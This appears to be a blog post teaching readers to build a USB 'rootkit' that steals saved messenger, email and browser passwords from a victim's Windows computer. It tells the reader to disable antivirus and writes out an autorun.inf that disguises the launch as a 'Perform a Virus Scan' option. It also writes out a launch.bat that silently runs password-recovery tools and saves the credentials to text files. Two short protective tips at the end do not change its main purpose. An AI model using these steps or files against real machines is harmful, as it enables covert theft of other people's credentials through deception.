Have you ever imagined that a tiny USB/Pen Drive can be used as a deadly gadget for hacking passwords? Yes, it can be made possible. See below to find the truth.
The Windows operating system stores some of the mostly used passwords for the user for the general purposes. This includes a number of necessary applications:-
- Useful and instant messenger MSN, AOL, g-talk etc.
- The outlook express
- SMTP, POP, FTP account
- Auto-complete saved passwords for different web browsers like Internet Explorer, Firefox, google chrome etc.
Some applications/tools can be made to search for these saved passwords. All we need is a customized rootkit. Let’s see what will contain in our rootkit.
Massen Pass: It will recover all the passwords from the mostly used messenger applications like MSN Messenger, AOL Messenger, Yahoo Messenger, ICQ and many more.
Mail Pass view: It will recover the saved passwords from well-known e-mail clients like Microsoft Outlook express, Mozilla Thunderbird, Netscape Mail, IncrediMail, Eudora etc. Moreover, this Mail pass view can be used to recover the passwords of web-based e-mail accounts which include Hotmail, Yahoo!, Gmail etc. if the user is using the associated programs to access the accounts.
Web Browser Pass view: It will recover the passwords saved in all the web browsers installed in the PC. It includes all supported web browsers like Internet explorer, Google chrome, Mozilla Firefox, apple safari, Netscape browser, Opera etc.
Procedure for creating the customized rootkit:
NOTE : For the creation steps, first disable the antivirus.
- Extract the above discussed applications into the USB pendrive. Download link: secure
- Create a notepad and just fill the content below into it.
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
Then save the notepad as autorun.inf and copy the newly created autorun.inf onto the USB pendrive.
* Then create another notepad and paste the content below onto it.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start webbrowserpassview.exe /stext webbrowserpassview.txt
* Then save the said notepad file as launch.bat
* Copy the launch.bat to the USB pendrive as you have done earlier.
* That’s it. The rootkit is ready to operate and explore onto the victim’s computer.
Steps to follow:
- After inserting the pendrive, an autorun window shall pop-up. Just select the first option of performing a virus scan.
- Now all the pre-programmed applications will do their work of collecting passwords in the background and stored in .txt files.
Steps to safe yourself from these dirty tricks :
1. Don’t go for any pop-up provided scanning procedure. Always go for scanning by antivirus only from the antivirus window.
2. Keep your antivirus updated regularly.
No comments:
Post a Comment